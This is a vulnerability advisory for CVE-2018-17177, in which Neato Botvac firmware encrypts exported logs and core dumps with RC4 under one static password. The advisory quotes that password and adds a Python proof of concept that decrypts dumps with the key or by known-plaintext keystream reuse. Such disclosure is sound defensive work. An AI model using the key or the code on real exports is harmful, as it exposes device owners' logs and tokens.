PT-2018-13937 · Neato · Neato Botvac Connected, Neato Botvac 85

Published 2018-09-18 · Updated 2021-06-17 · CVE-2018-17177

CVSS v3.1: 2.4 (Low)
Vector: AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Name of the Vulnerable Software and Affected Versions
Neato Botvac Connected, version 2.2.0
Neato Botvac 85, version 1.2.1

Description
Static encryption is used when copying event logs and core dumps to a USB stick. The exported files are RC4-encrypted with a 9-character password, *^JEd4W!I, that is obfuscated inside a custom /bin/rc4 crypt binary on the device. Because the key is the same on every device and never changes, anyone who recovers it from the binary (it is present in every copy of the affected firmware) can decrypt every exported dump; the obfuscation is not a security boundary. RC4 is also a stream cipher with no IV, so under a fixed key every export reuses the same keystream: a known plaintext in one dump (for example a fixed header line) yields the keystream bytes needed to read the same offsets of any other dump without the key at all.

Recommendations
The issue is the same on Neato Botvac Connected 2.2.0 and Neato Botvac 85 1.2.1, so the advice applies to both. Treat any event log or core dump exported to USB as readable by whoever obtains the stick or the file, and handle the dumps accordingly (wipe the stick after use, do not forward dumps over untrusted channels). Until the vendor replaces the scheme with an authenticated cipher under a per-device or per-export key, avoid exporting logs and core dumps to USB where possible; restricting access to /bin/rc4 on the device does not help, since the key can be recovered from any firmware image. Do not reuse the *^JEd4W!I password, or the /bin/rc4 scheme, in any other security context.
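As an added illustration (not code from this page or from Neato), the following Python models the scheme described above: RC4 under one fixed key for every export. It assumes the 9-byte ASCII password is used directly as the RC4 key; how /bin/rc4 actually derives its key and the real dump format are not documented here, and the sample log lines are constructed. It shows two attacker paths: decrypting a dump with the key recovered from the firmware, and, without any key, recovering the keystream from a known plaintext prefix of one dump and applying it to another, which works because a fixed-key stream cipher reuses its keystream on every export.

```python
"""RC4 with a fixed key, as CVE-2018-17177 describes for Neato log/core-dump export.

Added illustration, not Neato's /bin/rc4 binary. Assumption: the 9-byte ASCII
password is fed to RC4 directly as the key; the real binary's key derivation
(if any) and dump format are not documented on the advisory page.
"""
from typing import Iterator, Optional

STATIC_PASSWORD = b"*^JEd4W!I"  # the password quoted in the advisory


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Yield the RC4 keystream for `key` (KSA followed by PRGA)."""
    if not key:
        raise ValueError("RC4 key must be non-empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                               # pseudo-random generation algorithm
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def export_to_usb(log_text: bytes) -> bytes:
    """Model of the vulnerable step: every device, every export, same key, no IV."""
    return rc4(STATIC_PASSWORD, log_text)


def looks_like_text(data: bytes, threshold: float = 0.95) -> bool:
    """Heuristic to confirm a decryption attempt produced a log, not noise."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in b"\r\n\t")
    return printable / len(data) >= threshold


def decrypt_usb_dump(blob: bytes, password: bytes = STATIC_PASSWORD) -> Optional[bytes]:
    """Attacker WITH the key extracted from the firmware binary."""
    plain = rc4(password, blob)
    return plain if looks_like_text(plain) else None


def recover_keystream(known_plaintext: bytes, ciphertext: bytes) -> bytes:
    """Attacker WITHOUT the key: a known prefix (e.g. a fixed banner) of one dump
    gives the keystream prefix, identical for every dump under a fixed RC4 key."""
    n = min(len(known_plaintext), len(ciphertext))
    return bytes(p ^ c for p, c in zip(known_plaintext[:n], ciphertext[:n]))


def decrypt_with_keystream(ciphertext: bytes, keystream: bytes) -> bytes:
    """Decrypt as many bytes of another dump as the recovered keystream covers."""
    n = min(len(keystream), len(ciphertext))
    return bytes(c ^ k for c, k in zip(ciphertext[:n], keystream[:n]))


# Constructed sample dumps for the demo (not real Neato output).
SAMPLE_LOG_A = (b"event_log v1\n"
                b"2018-09-18 10:02:11 wifi_connect ssid=home-net\n"
                b"2018-09-18 10:02:14 cloud_auth token=eyJhbGciOi...\n")
SAMPLE_LOG_B = (b"event_log v1\n"
                b"2018-09-19 07:45:00 cleaning_start map=kitchen\n")


def demo() -> dict:
    """Run both attacker paths against two constructed exports."""
    dump_a = export_to_usb(SAMPLE_LOG_A)
    dump_b = export_to_usb(SAMPLE_LOG_B)
    with_key = decrypt_usb_dump(dump_a)                 # path 1: key from firmware
    ks = recover_keystream(SAMPLE_LOG_A, dump_a)        # path 2: known plaintext only
    without_key = decrypt_with_keystream(dump_b, ks)    # keystream reused across dumps
    return {"with_key": with_key, "without_key": without_key}


if __name__ == "__main__":
    # Sanity-check the cipher against the public RC4 test vector ("Key"/"Plaintext").
    assert rc4(b"Key", b"Plaintext") == bytes.fromhex("BBF316E8D940AF0AD3")
    out = demo()
    print(out["with_key"].decode())
    print(out["without_key"].decode())
```

In the second path the recovered keystream only covers as many bytes as the known plaintext, so in practice an attacker with just a known header reads the header-sized prefix of every other dump; in the demo the known dump is longer than the target, so the target is recovered in full. Neither path depends on defeating the obfuscation in /bin/rc4.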

Exploit

No public exploit is listed on this page.

Fix

No fix is listed on this page.

Weakness Enumeration

Inadequate Encryption Strength (CWE-326)

Related identifiers

CVE-2018-17177

Affected products

Neato Botvac 85
Neato Botvac Connected